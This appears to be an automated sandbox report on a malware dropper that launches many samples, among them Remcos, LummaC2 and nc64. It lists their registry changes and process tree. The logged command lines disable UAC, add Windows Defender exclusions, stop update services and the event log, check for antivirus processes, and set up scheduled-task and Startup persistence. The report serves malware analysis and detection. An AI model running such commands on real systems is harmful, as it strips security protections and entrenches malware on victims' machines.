| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\Files\lega.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\Files\lega.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\nano.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | C:\ProgramData\tst\remcos.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\printui.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AnneSalt.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Technique Technique.cmd & Technique.cmd & exit
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 79556
C:\Windows\SysWOW64\findstr.exe
findstr /V "SpecificationsRemainExtraIntellectual" Compile
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Cruz + Occupations + Grab + Recovery 79556\J
C:\Users\Admin\AppData\Local\Temp\79556\Boxing.pif
Boxing.pif J
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Local\Temp\Files\client.exe
"C:\Users\Admin\AppData\Local\Temp\Files\client.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Characteristic" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & echo URL="C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Characteristic" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 964 -s 636
C:\Users\Admin\AppData\Local\Temp\79556\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\79556\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\Files\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\Files\runtime.exe"
C:\Users\Admin\AppData\Local\Temp\Files\kyjjrfgjjsedf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kyjjrfgjjsedf.exe"
C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
"C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
C:\Users\Admin\AppData\Local\Temp\384522037.exe
C:\Users\Admin\AppData\Local\Temp\384522037.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\sysnldcvmr.exe
C:\Users\Admin\sysnldcvmr.exe
C:\Users\Admin\AppData\Local\Temp\2354925334.exe
C:\Users\Admin\AppData\Local\Temp\2354925334.exe
C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\Files\t5abhIx.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\Files\game.exe
"C:\Users\Admin\AppData\Local\Temp\Files\game.exe"
C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\Files\creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\creal.exe"
C:\Users\Admin\AppData\Local\Temp\Files\creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\creal.exe"
C:\Users\Admin\AppData\Local\Temp\Files\octus.exe
"C:\Users\Admin\AppData\Local\Temp\Files\octus.exe"
C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe
"C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe"
C:\Windows\SysWOW64\cmd.exe
/c timeout 5 && del "C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe" && exit
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rorukal.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe"
C:\Users\Admin\AppData\Local\Temp\Files\winsetaccess64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\winsetaccess64.exe"
C:\Users\Admin\AppData\Local\Temp\Files\m7lgy8vtbo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\m7lgy8vtbo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\m7lgy8vtbo.exe
"C:\Users\Admin\AppData\Local\Temp\Files\m7lgy8vtbo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\World%20of%20Tanks.exe
"C:\Users\Admin\AppData\Local\Temp\Files\World%20of%20Tanks.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 256
C:\Users\Admin\AppData\Local\Temp\Files\Operation6572.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Operation6572.exe"
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
C:\Users\Admin\AppData\Local\Temp\Files\output.exe
"C:\Users\Admin\AppData\Local\Temp\Files\output.exe"
C:\Users\Admin\AppData\Local\Temp\180827899.exe
C:\Users\Admin\AppData\Local\Temp\180827899.exe
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe
"C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"
C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Posing Posing.cmd && Posing.cmd
C:\Users\Admin\AppData\Local\Temp\Files\nc64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\nc64.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 835450
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Winston + ..\Southwest + ..\W l
C:\Users\Admin\AppData\Local\Temp\835450\Mineral.com
Mineral.com l
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SecureNet Innovations Ltd\NovaGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url" & exit
C:\Users\Admin\AppData\Local\Temp\835450\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\835450\RegAsm.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1884 -s 1260
C:\Users\Admin\AppData\Local\Temp\Files\Office2024.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Office2024.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe"
C:\Users\Admin\AppData\Local\Temp\Files\3zv8x9q7.exe
"C:\Users\Admin\AppData\Local\Temp\Files\3zv8x9q7.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 332 -s 168
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {819FA44F-B2B4-4DCD-9188-87A6251FCE79} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.js"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.pif
"C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.pif" "C:\Users\Admin\AppData\Local\SwiftTech Solutions\S"
C:\Users\Admin\AppData\Local\Temp\Files\getlab.exe
"C:\Users\Admin\AppData\Local\Temp\Files\getlab.exe"
C:\Users\Admin\AppData\Local\Temp\is-AMU4D.tmp\getlab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AMU4D.tmp\getlab.tmp" /SL5="$30262,3335515,56832,C:\Users\Admin\AppData\Local\Temp\Files\getlab.exe"
C:\Users\Admin\AppData\Local\TuneAudioTool 2011.4.8100\tuneaudiotool32_64.exe
"C:\Users\Admin\AppData\Local\TuneAudioTool 2011.4.8100\tuneaudiotool32_64.exe" -i
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "QKJNEQWA"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
